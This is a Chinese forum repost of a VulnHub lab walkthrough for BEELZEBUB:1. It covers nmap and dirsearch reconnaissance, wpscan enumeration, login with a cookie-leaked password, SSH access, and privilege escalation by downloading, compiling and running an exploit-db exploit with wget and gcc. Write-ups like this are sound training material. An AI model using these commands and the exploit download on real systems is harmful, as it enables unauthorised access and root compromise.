ToB企服应用市场:ToB评测及商务社交产业平台

标题: 『vulnhub系列』BEELZEBUB- 1 [打印本页]

作者: 玛卡巴卡的卡巴卡玛    时间: 2024-5-27 15:45
标题: 『vulnhub系列』BEELZEBUB- 1
『vulnhub系列』BEELZEBUB- 1

下载地点:
  1. https://www.vulnhub.com/entry/beelzebub-1,742/
复制代码
信息搜集:

使用nmap扫描存活主机,发现主机开启了22和80端口
  1. nmap 192.168.0.*
复制代码

访问80端口的web服务,发现是apache的默认页面

使用dirsearch扫描目录
  1. dirsearch -u "http://192.168.0.140/"
复制代码

发现存在phpmyadmin等页面,访问index.php页面,发现是404 /login也是一样

感觉有猫腻,查看一下源代码,果然发现一行提示
  1. #我的心被加密了,"beelzebub"不知如何被入侵了,并且被解密了 md5
复制代码

大概的意思是本来是被加密的,后来被用md5解密了,现在我们使用md5加密一下
  1. d18e1e22becbd915b45e0e655429d487
复制代码
然后当作目录扫描一下
  1. dirsearch -u "http://192.168.0.140/d18e1e22becbd915b45e0e655429d487"
复制代码

然后我们发现是个Wordpress 网站,里面有登录页面(这里靶机换了ip变为192.168.0.128)

另有一个文件上传的目录页面

点开Talk To VALAK 发现是个带有输入框的页面

随便输入一个数据,查看cookie 多出来一个Password 值为M4k3Ad3a1

因为是Wordpress页面,因此可以使用工具wpscan
使用下令:
  1. wpscan --url=http://192.168.0.128/d18e1e22becbd915b45e0e655429d487/ --ignore-main-redirect --force -e --plugins-detection aggressive
复制代码
扫描到用户valak 和krampus 我们使用这两个用户名和密码M4k3Ad3a1进行登录

因为wordpress页面跳转有些题目,我们使用ssh登录,使用krampus登录成功

权限提拔:

进入体系后,使用下令ls -la 发现有两个文件很可疑

但是.sudo_as_admin_successful 大小为0所以我们直接看.bash_history可以看到下令历史
然后我们发现有一个wget和gcc编译下令,我们照着运行
  1. wget https://www.exploit-db.com/download/47009
  2. mv 47009 ./exploit.c
  3. gcc exploit.c -o 1
  4. ./1
复制代码

成果:



免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。




欢迎光临 ToB企服应用市场:ToB评测及商务社交产业平台 (https://dis.qidao123.com/) Powered by Discuz! X3.4